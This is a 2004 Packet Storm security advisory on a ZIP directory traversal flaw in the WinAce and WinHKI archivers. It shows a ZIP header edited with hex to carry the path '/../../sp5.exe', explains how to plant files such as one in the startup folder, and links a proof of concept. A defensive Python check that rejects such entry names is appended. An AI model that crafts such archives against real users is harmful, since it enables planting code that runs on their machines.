winaceHKI.txt

07 Jan 2005 | Reported by Rafel Ivgi | Type: packetstorm | Source: packetstormsecurity.com

WinAce and WinHKI have a ZIP file directory traversal vulnerability exploitable locally.

Code
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application: WinAce, WinHKI  
Vendors: http://www.webtoolmaster.com  
Versions: 1.4d  
Platforms: Windows  
Bug: ZIP File Directory Traversal  
Exploitation: Local (extract file)  
Date: 24 Dec 2004  
Author: Rafel Ivgi, The-Insider  
E-Mail: [email protected]  
Website: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
WinHKI is a file archiver which supports BH, CAB, HKI, JAR, LHA, TAR and GZ  
compression.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
This is a normal ZIP compressed file header:  
  
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..  
00000010 F209 3C2F 0F00 C8EE 0F00 0700 0000 7370 ..</..........sp  
00000020 352E 6578 65EC 5A7F 5454 577E 7F33 0C30 5.exe.Z.TTW~.3.0  
00000030 C0C0 1B94 8926 6A32 2AAE D9FC 206E 2628 .....&j2*... n&(  
00000040 2018 1186 4044 7D3A E40D 4940 4304 7CCC ...@D}:..I@C.|.  
  
In the following dump we can see how easy it is to change the path  
to anywhere we want, including the All Users startup folder.  
I just overwrote the original long file name to /../../sp5.exe  
  
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..  
00000010 F209 3C2F 0F00 C8EE 0F00 1000 0000 7662 ..</..........vb  
00000020 2F2E 2E2F 2E2E 2F73 7035 2E65 7865 EC5A /../../sp5.exe.Z  
00000030 7F54 5457 7E7F 330C 30C0 C01B 9489 266A .TTW~.3.0.....&j  
00000040 322A AED9 FC20 6E26 2820 1811 8640 447D 2*... n&( ...@D}  
  
All we need to do is ZIP-compress (using WinZip, WinRAR or WinAce)  
a file with a long name/path and change the path specified inside the file  
to whatever we want, using any hex editor such as HexWorkshop: just add  
anything to the filename.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
An online proof of concept can be found at:  
http://theinsider.web1000.com/WINACE-WINHKI ZIP TRANSVERSAL.zip  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Scripts and Codes will make me D.O.S , but they will never HACK me."  
  
`
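
Added example, not part of the original advisory: the check an extractor can run on each entry name before writing anything to disk. It reads the local file header layout shown in the two hex dumps (name length at offset 26, name at offset 30) and rejects names that would leave the destination directory. The function names `entry_name` and `safe_join` and the `out` directory are assumptions made for this illustration.

```python
import posixpath
import struct

# First 48 bytes of each local file header, copied from the advisory's hex dumps.
NORMAL_HDR = bytes.fromhex(
    "504B0304140002000800CC810C2FB78F"
    "F2093C2F0F00C8EE0F00070000007370"
    "352E657865EC5A7F5454577E7F330C30")
MODIFIED_HDR = bytes.fromhex(
    "504B0304140002000800CC810C2FB78F"
    "F2093C2F0F00C8EE0F00100000007662"
    "2F2E2E2F2E2E2F7370352E657865EC5A")


def entry_name(header: bytes) -> str:
    """Return the file name stored in a ZIP local file header."""
    if header[:4] != b"PK\x03\x04":
        raise ValueError("not a ZIP local file header")
    if len(header) < 30:
        raise ValueError("truncated header")
    # Offsets 26 and 28: little-endian name length and extra-field length.
    name_len, _extra_len = struct.unpack_from("<HH", header, 26)
    raw = header[30:30 + name_len]
    if len(raw) != name_len:
        raise ValueError("name runs past the end of the data")
    return raw.decode("cp437")  # legacy ZIP name encoding


def safe_join(dest: str, name: str) -> str:
    """Map an entry name to a path under dest, or raise ValueError."""
    parts = name.replace("\\", "/").split("/")
    # Reject absolute paths, drive letters and any parent-directory component.
    if parts[0] == "" or ":" in parts[0] or ".." in parts:
        raise ValueError(f"unsafe entry name: {name!r}")
    clean = [p for p in parts if p not in ("", ".")]
    if not clean:
        raise ValueError("empty entry name")
    return posixpath.join(dest, *clean)


if __name__ == "__main__":
    for hdr in (NORMAL_HDR, MODIFIED_HDR):
        name = entry_name(hdr)
        try:
            print(name, "->", safe_join("out", name))
        except ValueError as err:
            print(name, "-> rejected:", err)
```

Backslashes are normalized to forward slashes before the check because Windows treats both as path separators.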
